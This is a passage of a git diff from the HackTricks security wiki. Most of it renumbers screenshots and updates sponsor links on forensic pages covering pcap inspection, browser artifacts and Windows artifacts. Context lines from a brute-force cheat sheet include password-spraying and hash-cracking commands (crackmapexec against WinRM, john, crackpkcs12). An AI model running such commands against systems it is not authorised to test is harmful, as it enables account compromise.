 If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
index 696f88791..56403ef5a 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
@@ -80,7 +80,7 @@ You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://
 
 It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
 
-![](<../../../.gitbook/assets/image (239).png>)
+![](<../../../.gitbook/assets/image (242).png>)
 
 ### binvis
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
index af312de75..ce8a27b9f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
@@ -1,4 +1,4 @@
-
+# DNSCat pcap analysis
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content.
 
@@ -54,7 +54,6 @@ for p in rdpcap('ch21.pcap'):
 For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
 [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
 
-
 There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
 
 ```
@@ -70,9 +69,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
index 56c29d232..8d58f5f07 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 If you have a pcap containing the communication via USB of a keyboard like the following one:
 
-![](<../../../.gitbook/assets/image (959).png>)
+![](<../../../.gitbook/assets/image (962).png>)
 
 You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication:
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
index ea588f08e..09770e349 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md
@@ -18,9 +18,9 @@ Other ways to support HackTricks:
 
 When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:
 
-![](<../../../.gitbook/assets/image (103).png>)
+![](<../../../.gitbook/assets/image (106).png>)
 
-![](<../../../.gitbook/assets/image (489).png>)
+![](<../../../.gitbook/assets/image (492).png>)
 
 ### Brute Force
 
@@ -50,7 +50,7 @@ Once you have detected **unknown MAC** addresses communicating inside the networ
 
 Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
 
-![](<../../../.gitbook/assets/image (496).png>)
+![](<../../../.gitbook/assets/image (499).png>)
 
 <details>
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
index acc0fef51..67c2ee81d 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Improve your Wireshark skills
 
@@ -45,43 +45,43 @@ The following tutorials are amazing to learn some cool basic tricks:
 
 Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**:
 
-![](<../../../.gitbook/assets/image (253).png>)
+![](<../../../.gitbook/assets/image (256).png>)
 
 **Resolved Addresses**
 
 Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication.
 
-![](<../../../.gitbook/assets/image (890).png>)
+![](<../../../.gitbook/assets/image (893).png>)
 
 **Protocol Hierarchy**
 
 Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
 
-![](<../../../.gitbook/assets/image (583).png>)
+![](<../../../.gitbook/assets/image (586).png>)
 
 **Conversations**
 
 Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
 
-![](<../../../.gitbook/assets/image (450).png>)
+![](<../../../.gitbook/assets/image (453).png>)
 
 **Endpoints**
 
 Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
 
-![](<../../../.gitbook/assets/image (893).png>)
+![](<../../../.gitbook/assets/image (896).png>)
 
 **DNS info**
 
 Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
 
-![](<../../../.gitbook/assets/image (1060).png>)
+![](<../../../.gitbook/assets/image (1063).png>)
 
 **I/O Graph**
 
 Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
 
-![](<../../../.gitbook/assets/image (989).png>)
+![](<../../../.gitbook/assets/image (992).png>)
 
 ### Filters
 
@@ -107,7 +107,7 @@ If you want to **search** for **content** inside the **packets** of the sessions
 
 You can add a column that shows the Host HTTP header:
 
-![](<../../../.gitbook/assets/image (635).png>)
+![](<../../../.gitbook/assets/image (639).png>)
 
 And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
 
@@ -119,11 +119,11 @@ And a column that add the Server name from an initiating HTTPS connection (**ssl
 
 In current Wireshark instead of `bootp` you need to search for `DHCP`
 
-![](<../../../.gitbook/assets/image (1010).png>)
+![](<../../../.gitbook/assets/image (1013).png>)
 
 ### From NBNS
 
-![](<../../../.gitbook/assets/image (1000).png>)
+![](<../../../.gitbook/assets/image (1003).png>)
 
 ## Decrypting TLS
 
@@ -131,7 +131,7 @@ In current Wireshark instead of `bootp` you need to search for `DHCP`
 
 _edit>preference>protocol>ssl>_
 
-![](<../../../.gitbook/assets/image (1100).png>)
+![](<../../../.gitbook/assets/image (1103).png>)
 
 Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
 
@@ -143,11 +143,11 @@ To detect this search inside the environment for to variable `SSLKEYLOGFILE`
 
 A file of shared keys will look like this:
 
-![](<../../../.gitbook/assets/image (817).png>)
+![](<../../../.gitbook/assets/image (820).png>)
 
 To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename:
 
-![](<../../../.gitbook/assets/image (986).png>)
+![](<../../../.gitbook/assets/image (989).png>)
 
 ## ADB communication
 
@@ -182,7 +182,7 @@ f.close()
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -192,7 +192,6 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
-
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 2615d6a7e..0752589b6 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
 
 ## Browsers Artifacts <a href="#id-3def" id="id-3def"></a>
 
@@ -87,7 +87,7 @@ done < $passfile
 ```
 {% endcode %}
 
-![](<../../../.gitbook/assets/image (689).png>)
+![](<../../../.gitbook/assets/image (692).png>)
 
 ## Google Chrome
 
@@ -183,13 +183,13 @@ These paths and commands are crucial for accessing and understanding the browsin
 * [https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ\&pg=PA128\&lpg=PA128\&dq=%22This+file)
 * **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123**
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=browser-artifacts) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=browser-artifacts" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 62cb48dfb..b790746ea 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
 
 ## OneDrive
 
@@ -82,7 +82,7 @@ Apart from that information, to decrypt the databases you still need:
 
 Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/utils/dpapi\_data\_decryptor.html)**:**
 
-![](<../../../.gitbook/assets/image (440).png>)
+![](<../../../.gitbook/assets/image (443).png>)
 
 If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
 
@@ -115,13 +115,13 @@ Other tables inside this database contain more interesting information:
 * **deleted\_fields**: Dropbox deleted files
 * **date\_added**
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=local-cloud-storage) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=local-cloud-storage" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 7c0953271..a1e2d2614 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
 
 For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
 
@@ -37,13 +37,13 @@ sudo pip3 install -U oletools
 olevba -c /path/to/document #Extract macros
 ```
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=office-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=office-file-analysis" %}
 
 <details>
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index ac2268f91..4f7b672d4 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pdf-file-analysis) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pdf-file-analysis" %}
 
 **For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
index 70084666b..f77d5f28f 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
@@ -44,7 +44,7 @@ When a file is deleted in this folder 2 specific files are created:
 * `$I{id}`: File information (date of when it was deleted}
 * `$R{id}`: Content of the file
 
-![](<../../../.gitbook/assets/image (1026).png>)
+![](<../../../.gitbook/assets/image (1029).png>)
 
 Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
 
@@ -60,15 +60,15 @@ Shadow Copy is a technology included in Microsoft Windows that can create **back
 
 These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
 
-![](<../../../.gitbook/assets/image (91).png>)
+![](<../../../.gitbook/assets/image (94).png>)
 
 Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
 
-![](<../../../.gitbook/assets/image (573).png>)
+![](<../../../.gitbook/assets/image (576).png>)
 
 The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
 
-![](<../../../.gitbook/assets/image (251).png>)
+![](<../../../.gitbook/assets/image (254).png>)
 
 The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
 
@@ -128,7 +128,7 @@ The **created time** of any jumplist indicates the **the first time the file was
 
 You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
 
-![](<../../../.gitbook/assets/image (165).png>)
+![](<../../../.gitbook/assets/image (168).png>)
 
 (_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_)
 
@@ -146,7 +146,7 @@ It's possible to identify that a USB device was used thanks to the creation of:
 
 Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder:
 
-![](<../../../.gitbook/assets/image (215).png>)
+![](<../../../.gitbook/assets/image (218).png>)
 
 The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag.
 
@@ -164,7 +164,7 @@ Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about whe
 
 [**USBDetective**](https://usbdetective.com) can be used to obtain information about the USB devices that have been connected to an image.
 
-![](<../../../.gitbook/assets/image (449).png>)
+![](<../../../.gitbook/assets/image (452).png>)
 
 ### Plug and Play Cleanup
 
@@ -195,7 +195,7 @@ Emails contain **2 interesting parts: The headers and the content** of the email
 
 Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages:
 
-![](<../../../.gitbook/assets/image (590).png>)
+![](<../../../.gitbook/assets/image (593).png>)
 
 ### Windows Mail App
 
@@ -223,7 +223,7 @@ The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion
 
 You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
 
-![](<../../../.gitbook/assets/image (495).png>)
+![](<../../../.gitbook/assets/image (498).png>)
 
 ### Microsoft Outlook OST Files
 
@@ -314,7 +314,7 @@ To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/E
 .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
 ```
 
-![](<../../../.gitbook/assets/image (312).png>)
+![](<../../../.gitbook/assets/image (315).png>)
 
 ### Superprefetch
 
@@ -364,7 +364,7 @@ Such data is stored within the registry at specific locations based on the versi
 
 To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
 
-![](<../../../.gitbook/assets/image (72).png>)
+![](<../../../.gitbook/assets/image (75).png>)
 
 ### Amcache
 
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md
index 835bc6564..911750441 100644
--- a/generic-methodologies-and-resources/brute-force.md
+++ b/generic-methodologies-and-resources/brute-force.md
@@ -1,12 +1,12 @@
 # Brute Force - CheatSheet
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
 
 <details>
 
@@ -108,13 +108,13 @@ Finished in 0.920s.
 * [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
 * [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
 
 ## Services
 
@@ -544,13 +544,13 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
 crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
 ```
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
 
 ## Local
 
@@ -716,7 +716,7 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
 
 ### Cisco
 
-<figure><img src="../.gitbook/assets/image (660).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (663).png" alt=""><figcaption></figcaption></figure>
 
 ### DPAPI Master Key
 
@@ -747,13 +747,13 @@ zip -r file.xls .
 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
 ```
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
 
 ## Tools
 
@@ -910,10 +910,10 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
